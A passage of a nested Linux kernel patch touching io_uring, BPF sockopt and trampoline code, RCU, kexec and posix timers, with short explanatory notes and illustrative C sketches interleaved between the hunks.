+ 	char	rdb_DiskRevision[4];
+ 	char	rdb_ControllerVendor[8];
+ 	char	rdb_ControllerProduct[16];
+ 	char	rdb_ControllerRevision[4];
+-	__u32	rdb_Reserved5[10];
++	__be32	rdb_Reserved5[10];
+ };
+ 
+ #define	IDNAME_RIGIDDISK	0x5244534B	/* "RDSK" */
+@@ -50,16 +50,16 @@ struct RigidDiskBlock {
+ struct PartitionBlock {
+ 	__be32	pb_ID;
+ 	__be32	pb_SummedLongs;
+-	__s32	pb_ChkSum;
+-	__u32	pb_HostID;
++	__be32	pb_ChkSum;
++	__be32	pb_HostID;
+ 	__be32	pb_Next;
+-	__u32	pb_Flags;
+-	__u32	pb_Reserved1[2];
+-	__u32	pb_DevFlags;
++	__be32	pb_Flags;
++	__be32	pb_Reserved1[2];
++	__be32	pb_DevFlags;
+ 	__u8	pb_DriveName[32];
+-	__u32	pb_Reserved2[15];
++	__be32	pb_Reserved2[15];
+ 	__be32	pb_Environment[17];
+-	__u32	pb_EReserved[15];
++	__be32	pb_EReserved[15];
+ };
+ 
+ #define	IDNAME_PARTITION	0x50415254	/* "PART" */
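
Re-typing these on-disk fields as __be32 records that the Amiga RDB format
is big-endian and lets sparse flag any access that skips the byte-order
conversion. A minimal sketch of the accessor pattern this now enforces
(the function and the 512-byte floor are illustrative assumptions, not
part of the patch):

	#include <linux/affs_hardblocks.h>
	#include <linux/types.h>
	#include <asm/byteorder.h>

	static bool example_rdb_valid(const struct RigidDiskBlock *rdb)
	{
		/* __be32 fields must go through be32_to_cpu() */
		return be32_to_cpu(rdb->rdb_ID) == IDNAME_RIGIDDISK &&
		       be32_to_cpu(rdb->rdb_BlockBytes) >= 512;
	}
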
+diff --git a/include/uapi/linux/auto_dev-ioctl.h b/include/uapi/linux/auto_dev-ioctl.h
+index 62e625356dc81..08be539605fca 100644
+--- a/include/uapi/linux/auto_dev-ioctl.h
++++ b/include/uapi/linux/auto_dev-ioctl.h
+@@ -109,7 +109,7 @@ struct autofs_dev_ioctl {
+ 		struct args_ismountpoint	ismountpoint;
+ 	};
+ 
+-	char path[0];
++	char path[];
+ };
+ 
+ static inline void init_autofs_dev_ioctl(struct autofs_dev_ioctl *in)
+diff --git a/include/uapi/linux/videodev2.h b/include/uapi/linux/videodev2.h
+index 29da1f4b4578e..45fa03882ef18 100644
+--- a/include/uapi/linux/videodev2.h
++++ b/include/uapi/linux/videodev2.h
+@@ -1693,7 +1693,7 @@ struct v4l2_input {
+ 	__u8	     name[32];		/*  Label */
+ 	__u32	     type;		/*  Type of input */
+ 	__u32	     audioset;		/*  Associated audios (bitfield) */
+-	__u32        tuner;             /*  enum v4l2_tuner_type */
++	__u32        tuner;             /*  Tuner index */
+ 	v4l2_std_id  std;
+ 	__u32	     status;
+ 	__u32	     capabilities;
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index cc35aba1e4957..38bc0073a7d43 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -2346,7 +2346,7 @@ static inline int io_cqring_wait_schedule(struct io_ring_ctx *ctx,
+ 					  struct io_wait_queue *iowq,
+ 					  ktime_t *timeout)
+ {
+-	int ret;
++	int token, ret;
+ 	unsigned long check_cq;
+ 
+ 	/* make sure we run task_work before checking for signals */
+@@ -2362,9 +2362,18 @@ static inline int io_cqring_wait_schedule(struct io_ring_ctx *ctx,
+ 		if (check_cq & BIT(IO_CHECK_CQ_DROPPED_BIT))
+ 			return -EBADR;
+ 	}
++
++	/*
++	 * Use io_schedule_prepare/finish, so cpufreq can take into account
++	 * that the task is waiting for IO - turns out to be important for low
++	 * QD IO.
++	 */
++	token = io_schedule_prepare();
++	ret = 1;
+ 	if (!schedule_hrtimeout(timeout, HRTIMER_MODE_ABS))
+-		return -ETIME;
+-	return 1;
++		ret = -ETIME;
++	io_schedule_finish(token);
++	return ret;
+ }
+ 
+ /*
+@@ -2748,7 +2757,18 @@ static __cold void io_ring_exit_work(struct work_struct *work)
+ 			/* there is little hope left, don't run it too often */
+ 			interval = HZ * 60;
+ 		}
+-	} while (!wait_for_completion_timeout(&ctx->ref_comp, interval));
++		/*
++		 * This is really an uninterruptible wait, as it has to be
++		 * complete. But it's also run from a kworker, which doesn't
++		 * take signals, so it's fine to make it interruptible. This
++		 * avoids scenarios where we knowingly can wait much longer
++		 * on completions, for example if someone does a SIGSTOP on
++		 * a task that needs to finish task_work to make this loop
++		 * complete. That's a synthetic situation that should not
++		 * cause a stuck task backtrace, and hence a potential panic
++		 * on stuck tasks if that is enabled.
++		 */
++	} while (!wait_for_completion_interruptible_timeout(&ctx->ref_comp, interval));
+ 
+ 	init_completion(&exit.completion);
+ 	init_task_work(&exit.task_work, io_tctx_exit_cb);
+@@ -2772,7 +2792,12 @@ static __cold void io_ring_exit_work(struct work_struct *work)
+ 			continue;
+ 
+ 		mutex_unlock(&ctx->uring_lock);
+-		wait_for_completion(&exit.completion);
++		/*
++		 * See comment above for
++		 * wait_for_completion_interruptible_timeout() on why this
++		 * wait is marked as interruptible.
++		 */
++		wait_for_completion_interruptible(&exit.completion);
+ 		mutex_lock(&ctx->uring_lock);
+ 	}
+ 	mutex_unlock(&ctx->uring_lock);
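
io_schedule_prepare() marks the current task as in_iowait and returns a token so io_schedule_finish() can restore the previous state, which lets cpufreq and the scheduler account the sleep as I/O wait rather than idleness. The general shape of that pairing, as a sketch (the waiting primitive chosen here is arbitrary):

    #include <linux/sched.h>
    #include <linux/completion.h>

    /* Sleep on an event with iowait accounting (illustrative). */
    static long wait_for_io_event(struct completion *done, unsigned long timeout)
    {
            int token = io_schedule_prepare();  /* set current->in_iowait */
            long ret = wait_for_completion_interruptible_timeout(done, timeout);

            io_schedule_finish(token);          /* restore previous state */
            return ret;
    }
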
+diff --git a/kernel/bpf/btf.c b/kernel/bpf/btf.c
+index 8220caa488c54..fb78bb26786fc 100644
+--- a/kernel/bpf/btf.c
++++ b/kernel/bpf/btf.c
+@@ -7469,10 +7469,8 @@ int register_btf_kfunc_id_set(enum bpf_prog_type prog_type,
+ 			pr_err("missing vmlinux BTF, cannot register kfuncs\n");
+ 			return -ENOENT;
+ 		}
+-		if (kset->owner && IS_ENABLED(CONFIG_DEBUG_INFO_BTF_MODULES)) {
+-			pr_err("missing module BTF, cannot register kfuncs\n");
+-			return -ENOENT;
+-		}
++		if (kset->owner && IS_ENABLED(CONFIG_DEBUG_INFO_BTF_MODULES))
++			pr_warn("missing module BTF, cannot register kfuncs\n");
+ 		return 0;
+ 	}
+ 	if (IS_ERR(btf))
+diff --git a/kernel/bpf/cgroup.c b/kernel/bpf/cgroup.c
+index b86b907e566ca..bb70f400c25eb 100644
+--- a/kernel/bpf/cgroup.c
++++ b/kernel/bpf/cgroup.c
+@@ -1826,6 +1826,12 @@ int __cgroup_bpf_run_filter_setsockopt(struct sock *sk, int *level,
+ 		ret = 1;
+ 	} else if (ctx.optlen > max_optlen || ctx.optlen < -1) {
+ 		/* optlen is out of bounds */
++		if (*optlen > PAGE_SIZE && ctx.optlen >= 0) {
++			pr_info_once("bpf setsockopt: ignoring program buffer with optlen=%d (max_optlen=%d)\n",
++				     ctx.optlen, max_optlen);
++			ret = 0;
++			goto out;
++		}
+ 		ret = -EFAULT;
+ 	} else {
+ 		/* optlen within bounds, run kernel handler */
+@@ -1881,8 +1887,10 @@ int __cgroup_bpf_run_filter_getsockopt(struct sock *sk, int level,
+ 		.optname = optname,
+ 		.current_task = current,
+ 	};
++	int orig_optlen;
+ 	int ret;
+ 
++	orig_optlen = max_optlen;
+ 	ctx.optlen = max_optlen;
+ 	max_optlen = sockopt_alloc_buf(&ctx, max_optlen, &buf);
+ 	if (max_optlen < 0)
+@@ -1905,6 +1913,7 @@ int __cgroup_bpf_run_filter_getsockopt(struct sock *sk, int level,
+ 			ret = -EFAULT;
+ 			goto out;
+ 		}
++		orig_optlen = ctx.optlen;
+ 
+ 		if (copy_from_user(ctx.optval, optval,
+ 				   min(ctx.optlen, max_optlen)) != 0) {
+@@ -1922,6 +1931,12 @@ int __cgroup_bpf_run_filter_getsockopt(struct sock *sk, int level,
+ 		goto out;
+ 
+ 	if (optval && (ctx.optlen > max_optlen || ctx.optlen < 0)) {
++		if (orig_optlen > PAGE_SIZE && ctx.optlen >= 0) {
++			pr_info_once("bpf getsockopt: ignoring program buffer with optlen=%d (max_optlen=%d)\n",
++				     ctx.optlen, max_optlen);
++			ret = retval;
++			goto out;
++		}
+ 		ret = -EFAULT;
+ 		goto out;
+ 	}
+diff --git a/kernel/bpf/trampoline.c b/kernel/bpf/trampoline.c
+index f1504cb5b6e19..30af8f66e17b4 100644
+--- a/kernel/bpf/trampoline.c
++++ b/kernel/bpf/trampoline.c
+@@ -279,11 +279,8 @@ bpf_trampoline_get_progs(const struct bpf_trampoline *tr, int *total, bool *ip_a
+ 	return tlinks;
+ }
+ 
+-static void __bpf_tramp_image_put_deferred(struct work_struct *work)
++static void bpf_tramp_image_free(struct bpf_tramp_image *im)
+ {
+-	struct bpf_tramp_image *im;
+-
+-	im = container_of(work, struct bpf_tramp_image, work);
+ 	bpf_image_ksym_del(&im->ksym);
+ 	bpf_jit_free_exec(im->image);
+ 	bpf_jit_uncharge_modmem(PAGE_SIZE);
+@@ -291,6 +288,14 @@ static void __bpf_tramp_image_put_deferred(struct work_struct *work)
+ 	kfree_rcu(im, rcu);
+ }
+ 
++static void __bpf_tramp_image_put_deferred(struct work_struct *work)
++{
++	struct bpf_tramp_image *im;
++
++	im = container_of(work, struct bpf_tramp_image, work);
++	bpf_tramp_image_free(im);
++}
++
+ /* callback, fexit step 3 or fentry step 2 */
+ static void __bpf_tramp_image_put_rcu(struct rcu_head *rcu)
+ {
+@@ -372,7 +377,7 @@ static void bpf_tramp_image_put(struct bpf_tramp_image *im)
+ 	call_rcu_tasks_trace(&im->rcu, __bpf_tramp_image_put_rcu_tasks);
+ }
+ 
+-static struct bpf_tramp_image *bpf_tramp_image_alloc(u64 key, u32 idx)
++static struct bpf_tramp_image *bpf_tramp_image_alloc(u64 key)
+ {
+ 	struct bpf_tramp_image *im;
+ 	struct bpf_ksym *ksym;
+@@ -399,7 +404,7 @@ static struct bpf_tramp_image *bpf_tramp_image_alloc(u64 key, u32 idx)
+ 
+ 	ksym = &im->ksym;
+ 	INIT_LIST_HEAD_RCU(&ksym->lnode);
+-	snprintf(ksym->name, KSYM_NAME_LEN, "bpf_trampoline_%llu_%u", key, idx);
++	snprintf(ksym->name, KSYM_NAME_LEN, "bpf_trampoline_%llu", key);
+ 	bpf_image_ksym_add(image, ksym);
+ 	return im;
+ 
+@@ -429,11 +434,10 @@ static int bpf_trampoline_update(struct bpf_trampoline *tr, bool lock_direct_mut
+ 		err = unregister_fentry(tr, tr->cur_image->image);
+ 		bpf_tramp_image_put(tr->cur_image);
+ 		tr->cur_image = NULL;
+-		tr->selector = 0;
+ 		goto out;
+ 	}
+ 
+-	im = bpf_tramp_image_alloc(tr->key, tr->selector);
++	im = bpf_tramp_image_alloc(tr->key);
+ 	if (IS_ERR(im)) {
+ 		err = PTR_ERR(im);
+ 		goto out;
+@@ -466,13 +470,12 @@ again:
+ 					  &tr->func.model, tr->flags, tlinks,
+ 					  tr->func.addr);
+ 	if (err < 0)
+-		goto out;
++		goto out_free;
+ 
+ 	set_memory_ro((long)im->image, 1);
+ 	set_memory_x((long)im->image, 1);
+ 
+-	WARN_ON(tr->cur_image && tr->selector == 0);
+-	WARN_ON(!tr->cur_image && tr->selector);
++	WARN_ON(tr->cur_image && total == 0);
+ 	if (tr->cur_image)
+ 		/* progs already running at this address */
+ 		err = modify_fentry(tr, tr->cur_image->image, im->image, lock_direct_mutex);
+@@ -497,18 +500,21 @@ again:
+ 	}
+ #endif
+ 	if (err)
+-		goto out;
++		goto out_free;
+ 
+ 	if (tr->cur_image)
+ 		bpf_tramp_image_put(tr->cur_image);
+ 	tr->cur_image = im;
+-	tr->selector++;
+ out:
+ 	/* If any error happens, restore previous flags */
+ 	if (err)
+ 		tr->flags = orig_flags;
+ 	kfree(tlinks);
+ 	return err;
++
++out_free:
++	bpf_tramp_image_free(im);
++	goto out;
+ }
+ 
+ static enum bpf_tramp_prog_type bpf_attach_type_to_tramp(struct bpf_prog *prog)
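
The out_free label introduced above exists so that every error after bpf_tramp_image_alloc() frees the fresh image exactly once, while the shared out path still restores the flags and frees tlinks. Reduced to its control-flow shape (all names hypothetical):

    /* Single-exit error unwind with a late-allocated resource. */
    static int update_thing(struct ctx *c)
    {
            struct thing *t;
            int err;

            t = thing_alloc(c);
            if (IS_ERR(t))
                    return PTR_ERR(t);

            err = thing_install(c, t);
            if (err)
                    goto out_free;
            c->cur = t;
    out:
            return err;
    out_free:
            thing_free(t);
            goto out;
    }
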
+diff --git a/kernel/kcsan/core.c b/kernel/kcsan/core.c
+index 5a60cc52adc0c..8a7baf4e332e3 100644
+--- a/kernel/kcsan/core.c
++++ b/kernel/kcsan/core.c
+@@ -1270,7 +1270,9 @@ static __always_inline void kcsan_atomic_builtin_memorder(int memorder)
+ DEFINE_TSAN_ATOMIC_OPS(8);
+ DEFINE_TSAN_ATOMIC_OPS(16);
+ DEFINE_TSAN_ATOMIC_OPS(32);
++#ifdef CONFIG_64BIT
+ DEFINE_TSAN_ATOMIC_OPS(64);
++#endif
+ 
+ void __tsan_atomic_thread_fence(int memorder);
+ void __tsan_atomic_thread_fence(int memorder)
+diff --git a/kernel/kexec_core.c b/kernel/kexec_core.c
+index ca2743f9c634e..79c012fbb49c8 100644
+--- a/kernel/kexec_core.c
++++ b/kernel/kexec_core.c
+@@ -1035,6 +1035,7 @@ int crash_shrink_memory(unsigned long new_size)
+ 	start = crashk_res.start;
+ 	end = crashk_res.end;
+ 	old_size = (end == 0) ? 0 : end - start + 1;
++	new_size = roundup(new_size, KEXEC_CRASH_MEM_ALIGN);
+ 	if (new_size >= old_size) {
+ 		ret = (new_size == old_size) ? 0 : -EINVAL;
+ 		goto unlock;
+@@ -1046,9 +1047,7 @@ int crash_shrink_memory(unsigned long new_size)
+ 		goto unlock;
+ 	}
+ 
+-	start = roundup(start, KEXEC_CRASH_MEM_ALIGN);
+-	end = roundup(start + new_size, KEXEC_CRASH_MEM_ALIGN);
+-
++	end = start + new_size;
+ 	crash_free_reserved_phys_range(end, crashk_res.end);
+ 
+ 	if ((start == end) && (crashk_res.parent != NULL))
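
Rounding new_size up once at the top keeps the retained region aligned and makes the later end = start + new_size exact. For reference, roundup(x, y) yields the smallest multiple of y that is >= x; a compile-time sketch (4096 is an illustrative alignment, not necessarily KEXEC_CRASH_MEM_ALIGN):

    #include <linux/math.h>
    #include <linux/build_bug.h>
    #include <linux/compiler.h>

    static void __maybe_unused roundup_examples(void)
    {
            BUILD_BUG_ON(roundup(1, 4096)    != 4096);
            BUILD_BUG_ON(roundup(4096, 4096) != 4096);
            BUILD_BUG_ON(roundup(4097, 4096) != 8192);
    }
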
+diff --git a/kernel/rcu/rcu.h b/kernel/rcu/rcu.h
+index be5979da07f59..48d8f754b730e 100644
+--- a/kernel/rcu/rcu.h
++++ b/kernel/rcu/rcu.h
+@@ -583,4 +583,10 @@ void show_rcu_tasks_trace_gp_kthread(void);
+ static inline void show_rcu_tasks_trace_gp_kthread(void) {}
+ #endif
+ 
++#ifdef CONFIG_TINY_RCU
++static inline bool rcu_cpu_beenfullyonline(int cpu) { return true; }
++#else
++bool rcu_cpu_beenfullyonline(int cpu);
++#endif
++
+ #endif /* __LINUX_RCU_H */
+diff --git a/kernel/rcu/rcuscale.c b/kernel/rcu/rcuscale.c
+index 3ef02d4a81085..7854dc3226e1b 100644
+--- a/kernel/rcu/rcuscale.c
++++ b/kernel/rcu/rcuscale.c
+@@ -521,89 +521,6 @@ rcu_scale_print_module_parms(struct rcu_scale_ops *cur_ops, const char *tag)
+ 		 scale_type, tag, nrealreaders, nrealwriters, verbose, shutdown);
+ }
+ 
+-static void
+-rcu_scale_cleanup(void)
+-{
+-	int i;
+-	int j;
+-	int ngps = 0;
+-	u64 *wdp;
+-	u64 *wdpp;
+-
+-	/*
+-	 * Would like warning at start, but everything is expedited
+-	 * during the mid-boot phase, so have to wait till the end.
+-	 */
+-	if (rcu_gp_is_expedited() && !rcu_gp_is_normal() && !gp_exp)
+-		SCALEOUT_ERRSTRING("All grace periods expedited, no normal ones to measure!");
+-	if (rcu_gp_is_normal() && gp_exp)
+-		SCALEOUT_ERRSTRING("All grace periods normal, no expedited ones to measure!");
+-	if (gp_exp && gp_async)
+-		SCALEOUT_ERRSTRING("No expedited async GPs, so went with async!");
+-
+-	if (torture_cleanup_begin())
+-		return;
+-	if (!cur_ops) {
+-		torture_cleanup_end();
+-		return;
+-	}
+-
+-	if (reader_tasks) {
+-		for (i = 0; i < nrealreaders; i++)
+-			torture_stop_kthread(rcu_scale_reader,
+-					     reader_tasks[i]);
+-		kfree(reader_tasks);
+-	}
+-
+-	if (writer_tasks) {
+-		for (i = 0; i < nrealwriters; i++) {
+-			torture_stop_kthread(rcu_scale_writer,
+-					     writer_tasks[i]);
+-			if (!writer_n_durations)
+-				continue;
+-			j = writer_n_durations[i];
+-			pr_alert("%s%s writer %d gps: %d\n",
+-				 scale_type, SCALE_FLAG, i, j);
+-			ngps += j;
+-		}
+-		pr_alert("%s%s start: %llu end: %llu duration: %llu gps: %d batches: %ld\n",
+-			 scale_type, SCALE_FLAG,
+-			 t_rcu_scale_writer_started, t_rcu_scale_writer_finished,
+-			 t_rcu_scale_writer_finished -
+-			 t_rcu_scale_writer_started,
+-			 ngps,
+-			 rcuscale_seq_diff(b_rcu_gp_test_finished,
+-					   b_rcu_gp_test_started));
+-		for (i = 0; i < nrealwriters; i++) {
+-			if (!writer_durations)
+-				break;
+-			if (!writer_n_durations)
+-				continue;
+-			wdpp = writer_durations[i];
+-			if (!wdpp)
+-				continue;
+-			for (j = 0; j < writer_n_durations[i]; j++) {
+-				wdp = &wdpp[j];
+-				pr_alert("%s%s %4d writer-duration: %5d %llu\n",
+-					scale_type, SCALE_FLAG,
+-					i, j, *wdp);
+-				if (j % 100 == 0)
+-					schedule_timeout_uninterruptible(1);
+-			}
+-			kfree(writer_durations[i]);
+-		}
+-		kfree(writer_tasks);
+-		kfree(writer_durations);
+-		kfree(writer_n_durations);
+-	}
+-
+-	/* Do torture-type-specific cleanup operations.  */
+-	if (cur_ops->cleanup != NULL)
+-		cur_ops->cleanup();
+-
+-	torture_cleanup_end();
+-}
+-
+ /*
+  * Return the number if non-negative.  If -1, the number of CPUs.
+  * If less than -1, that much less than the number of CPUs, but
+@@ -623,21 +540,6 @@ static int compute_real(int n)
+ 	return nr;
+ }
+ 
+-/*
+- * RCU scalability shutdown kthread.  Just waits to be awakened, then shuts
+- * down system.
+- */
+-static int
+-rcu_scale_shutdown(void *arg)
+-{
+-	wait_event(shutdown_wq,
+-		   atomic_read(&n_rcu_scale_writer_finished) >= nrealwriters);
+-	smp_mb(); /* Wake before output. */
+-	rcu_scale_cleanup();
+-	kernel_power_off();
+-	return -EINVAL;
+-}
+-
+ /*
+  * kfree_rcu() scalability tests: Start a kfree_rcu() loop on all CPUs for number
+  * of iterations and measure total time and number of GP for all iterations to complete.
+@@ -757,8 +659,8 @@ kfree_scale_cleanup(void)
+ static int
+ kfree_scale_shutdown(void *arg)
+ {
+-	wait_event(shutdown_wq,
+-		   atomic_read(&n_kfree_scale_thread_ended) >= kfree_nrealthreads);
++	wait_event_idle(shutdown_wq,
++			atomic_read(&n_kfree_scale_thread_ended) >= kfree_nrealthreads);
+ 
+ 	smp_mb(); /* Wake before output. */
+ 
+@@ -812,6 +714,108 @@ unwind:
+ 	return firsterr;
+ }
+ 
++static void
++rcu_scale_cleanup(void)
++{
++	int i;
++	int j;
++	int ngps = 0;
++	u64 *wdp;
++	u64 *wdpp;
++
++	/*
++	 * Would like warning at start, but everything is expedited
++	 * during the mid-boot phase, so have to wait till the end.
++	 */
++	if (rcu_gp_is_expedited() && !rcu_gp_is_normal() && !gp_exp)
++		SCALEOUT_ERRSTRING("All grace periods expedited, no normal ones to measure!");
++	if (rcu_gp_is_normal() && gp_exp)
++		SCALEOUT_ERRSTRING("All grace periods normal, no expedited ones to measure!");
++	if (gp_exp && gp_async)
++		SCALEOUT_ERRSTRING("No expedited async GPs, so went with async!");
++
++	if (kfree_rcu_test) {
++		kfree_scale_cleanup();
++		return;
++	}
++
++	if (torture_cleanup_begin())
++		return;
++	if (!cur_ops) {
++		torture_cleanup_end();
++		return;
++	}
++
++	if (reader_tasks) {
++		for (i = 0; i < nrealreaders; i++)
++			torture_stop_kthread(rcu_scale_reader,
++					     reader_tasks[i]);
++		kfree(reader_tasks);
++	}
++
++	if (writer_tasks) {
++		for (i = 0; i < nrealwriters; i++) {
++			torture_stop_kthread(rcu_scale_writer,
++					     writer_tasks[i]);
++			if (!writer_n_durations)
++				continue;
++			j = writer_n_durations[i];
++			pr_alert("%s%s writer %d gps: %d\n",
++				 scale_type, SCALE_FLAG, i, j);
++			ngps += j;
++		}
++		pr_alert("%s%s start: %llu end: %llu duration: %llu gps: %d batches: %ld\n",
++			 scale_type, SCALE_FLAG,
++			 t_rcu_scale_writer_started, t_rcu_scale_writer_finished,
++			 t_rcu_scale_writer_finished -
++			 t_rcu_scale_writer_started,
++			 ngps,
++			 rcuscale_seq_diff(b_rcu_gp_test_finished,
++					   b_rcu_gp_test_started));
++		for (i = 0; i < nrealwriters; i++) {
++			if (!writer_durations)
++				break;
++			if (!writer_n_durations)
++				continue;
++			wdpp = writer_durations[i];
++			if (!wdpp)
++				continue;
++			for (j = 0; j < writer_n_durations[i]; j++) {
++				wdp = &wdpp[j];
++				pr_alert("%s%s %4d writer-duration: %5d %llu\n",
++					scale_type, SCALE_FLAG,
++					i, j, *wdp);
++				if (j % 100 == 0)
++					schedule_timeout_uninterruptible(1);
++			}
++			kfree(writer_durations[i]);
++		}
++		kfree(writer_tasks);
++		kfree(writer_durations);
++		kfree(writer_n_durations);
++	}
++
++	/* Do torture-type-specific cleanup operations.  */
++	if (cur_ops->cleanup != NULL)
++		cur_ops->cleanup();
++
++	torture_cleanup_end();
++}
++
++/*
++ * RCU scalability shutdown kthread.  Just waits to be awakened, then shuts
++ * down system.
++ */
++static int
++rcu_scale_shutdown(void *arg)
++{
++	wait_event_idle(shutdown_wq, atomic_read(&n_rcu_scale_writer_finished) >= nrealwriters);
++	smp_mb(); /* Wake before output. */
++	rcu_scale_cleanup();
++	kernel_power_off();
++	return -EINVAL;
++}
++
+ static int __init
+ rcu_scale_init(void)
+ {
+diff --git a/kernel/rcu/tasks.h b/kernel/rcu/tasks.h
+index c8409601fec38..df968321feada 100644
+--- a/kernel/rcu/tasks.h
++++ b/kernel/rcu/tasks.h
+@@ -455,6 +455,7 @@ static void rcu_tasks_invoke_cbs(struct rcu_tasks *rtp, struct rcu_tasks_percpu
+ {
+ 	int cpu;
+ 	int cpunext;
++	int cpuwq;
+ 	unsigned long flags;
+ 	int len;
+ 	struct rcu_head *rhp;
+@@ -465,11 +466,13 @@ static void rcu_tasks_invoke_cbs(struct rcu_tasks *rtp, struct rcu_tasks_percpu
+ 	cpunext = cpu * 2 + 1;
+ 	if (cpunext < smp_load_acquire(&rtp->percpu_dequeue_lim)) {
+ 		rtpcp_next = per_cpu_ptr(rtp->rtpcpu, cpunext);
+-		queue_work_on(cpunext, system_wq, &rtpcp_next->rtp_work);
++		cpuwq = rcu_cpu_beenfullyonline(cpunext) ? cpunext : WORK_CPU_UNBOUND;
++		queue_work_on(cpuwq, system_wq, &rtpcp_next->rtp_work);
+ 		cpunext++;
+ 		if (cpunext < smp_load_acquire(&rtp->percpu_dequeue_lim)) {
+ 			rtpcp_next = per_cpu_ptr(rtp->rtpcpu, cpunext);
+-			queue_work_on(cpunext, system_wq, &rtpcp_next->rtp_work);
++			cpuwq = rcu_cpu_beenfullyonline(cpunext) ? cpunext : WORK_CPU_UNBOUND;
++			queue_work_on(cpuwq, system_wq, &rtpcp_next->rtp_work);
+ 		}
+ 	}
+ 
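
The guard above matters because work bound via queue_work_on() to a CPU that never finished onlining could sit unexecuted; falling back to WORK_CPU_UNBOUND lets any CPU run it. The same pattern as a standalone sketch (the wrapper name is illustrative):

    #include <linux/workqueue.h>

    /* Prefer a specific CPU; fall back to any CPU if it has never
     * been fully online (illustrative wrapper around the fix above).
     */
    static void queue_work_on_cpu_or_unbound(int cpu, struct work_struct *work)
    {
            int target = rcu_cpu_beenfullyonline(cpu) ? cpu : WORK_CPU_UNBOUND;

            queue_work_on(target, system_wq, work);
    }
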
+diff --git a/kernel/rcu/tree.c b/kernel/rcu/tree.c
+index d03122f90cc48..917a1e43f7839 100644
+--- a/kernel/rcu/tree.c
++++ b/kernel/rcu/tree.c
+@@ -4138,7 +4138,6 @@ int rcutree_prepare_cpu(unsigned int cpu)
+ 	 */
+ 	rnp = rdp->mynode;
+ 	raw_spin_lock_rcu_node(rnp);		/* irqs already disabled. */
+-	rdp->beenonline = true;	 /* We have now been online. */
+ 	rdp->gp_seq = READ_ONCE(rnp->gp_seq);
+ 	rdp->gp_seq_needed = rdp->gp_seq;
+ 	rdp->cpu_no_qs.b.norm = true;
+@@ -4165,6 +4164,16 @@ static void rcutree_affinity_setting(unsigned int cpu, int outgoing)
+ 	rcu_boost_kthread_setaffinity(rdp->mynode, outgoing);
+ }
+ 
++/*
++ * Has the specified (known valid) CPU ever been fully online?
++ */
++bool rcu_cpu_beenfullyonline(int cpu)
++{
++	struct rcu_data *rdp = per_cpu_ptr(&rcu_data, cpu);
++
++	return smp_load_acquire(&rdp->beenonline);
++}
++
+ /*
+  * Near the end of the CPU-online process.  Pretty much all services
+  * enabled, and the CPU is now very much alive.
+@@ -4223,15 +4232,16 @@ int rcutree_offline_cpu(unsigned int cpu)
+  * Note that this function is special in that it is invoked directly
+  * from the incoming CPU rather than from the cpuhp_step mechanism.
+  * This is because this function must be invoked at a precise location.
++ * This incoming CPU must not have enabled interrupts yet.
+  */
+ void rcu_cpu_starting(unsigned int cpu)
+ {
+-	unsigned long flags;
+ 	unsigned long mask;
+ 	struct rcu_data *rdp;
+ 	struct rcu_node *rnp;
+ 	bool newcpu;
+ 
++	lockdep_assert_irqs_disabled();
+ 	rdp = per_cpu_ptr(&rcu_data, cpu);
+ 	if (rdp->cpu_started)
+ 		return;
+@@ -4239,7 +4249,6 @@ void rcu_cpu_starting(unsigned int cpu)
+ 
+ 	rnp = rdp->mynode;
+ 	mask = rdp->grpmask;
+-	local_irq_save(flags);
+ 	arch_spin_lock(&rcu_state.ofl_lock);
+ 	rcu_dynticks_eqs_online();
+ 	raw_spin_lock(&rcu_state.barrier_lock);
+@@ -4258,17 +4267,17 @@ void rcu_cpu_starting(unsigned int cpu)
+ 	/* An incoming CPU should never be blocking a grace period. */
+ 	if (WARN_ON_ONCE(rnp->qsmask & mask)) { /* RCU waiting on incoming CPU? */
+ 		/* rcu_report_qs_rnp() *really* wants some flags to restore */
+-		unsigned long flags2;
++		unsigned long flags;
+ 
+-		local_irq_save(flags2);
++		local_irq_save(flags);
+ 		rcu_disable_urgency_upon_qs(rdp);
+ 		/* Report QS -after- changing ->qsmaskinitnext! */
+-		rcu_report_qs_rnp(mask, rnp, rnp->gp_seq, flags2);
++		rcu_report_qs_rnp(mask, rnp, rnp->gp_seq, flags);
+ 	} else {
+ 		raw_spin_unlock_rcu_node(rnp);
+ 	}
+ 	arch_spin_unlock(&rcu_state.ofl_lock);
+-	local_irq_restore(flags);
++	smp_store_release(&rdp->beenonline, true);
+ 	smp_mb(); /* Ensure RCU read-side usage follows above initialization. */
+ }
+ 
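
The smp_store_release() of ->beenonline pairs with the smp_load_acquire() in rcu_cpu_beenfullyonline() above: any reader that observes the flag as true is guaranteed to also observe the initialization performed before the store. The generic publish/consume shape, as a sketch (names hypothetical):

    #include <asm/barrier.h>

    static int shared_data;
    static bool ready;

    static void publisher(void)
    {
            shared_data = 42;                /* initialize first ...      */
            smp_store_release(&ready, true); /* ... then publish the flag */
    }

    static int consumer(void)
    {
            if (smp_load_acquire(&ready))    /* flag seen as true ...     */
                    return shared_data;      /* ... init is visible too   */
            return -1;
    }
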
+diff --git a/kernel/time/posix-timers.c b/kernel/time/posix-timers.c
+index 808a247205a9a..ed3c4a9543982 100644
+--- a/kernel/time/posix-timers.c
++++ b/kernel/time/posix-timers.c
+@@ -1037,27 +1037,52 @@ retry_delete:
+ }
+ 
+ /*
+- * return timer owned by the process, used by exit_itimers
++ * Delete a timer if it is armed, remove it from the hash and schedule it
++ * for RCU freeing.
+  */
+ static void itimer_delete(struct k_itimer *timer)
+ {
+-retry_delete:
+-	spin_lock_irq(&timer->it_lock);
++	unsigned long flags;
++
++	/*
++	 * irqsave is required to make timer_wait_running() work.
++	 */
++	spin_lock_irqsave(&timer->it_lock, flags);
+ 
++retry_delete:
++	/*
++	 * Even if the timer is no longer accessible from other tasks
++	 * it still might be armed and queued in the underlying timer
++	 * mechanism. Worse, that timer mechanism might run the expiry
++	 * function concurrently.
++	 */
+ 	if (timer_delete_hook(timer) == TIMER_RETRY) {
+-		spin_unlock_irq(&timer->it_lock);
++		/*
++		 * Timer is expired concurrently, prevent livelocks
++		 * and pointless spinning on RT.
++		 *
++		 * timer_wait_running() drops timer::it_lock, which opens
++		 * the possibility for another task to delete the timer.
++		 *
++		 * That's not possible here because this is invoked from
++		 * do_exit() only for the last thread of the thread group.
++		 * So no other task can access and delete that timer.
++		 */
++		if (WARN_ON_ONCE(timer_wait_running(timer, &flags) != timer))
++			return;
++
+ 		goto retry_delete;
+ 	}
+ 	list_del(&timer->list);
+ 
+-	spin_unlock_irq(&timer->it_lock);
++	spin_unlock_irqrestore(&timer->it_lock, flags);
+ 	release_posix_timer(timer, IT_ID_SET);
+ }
+ 
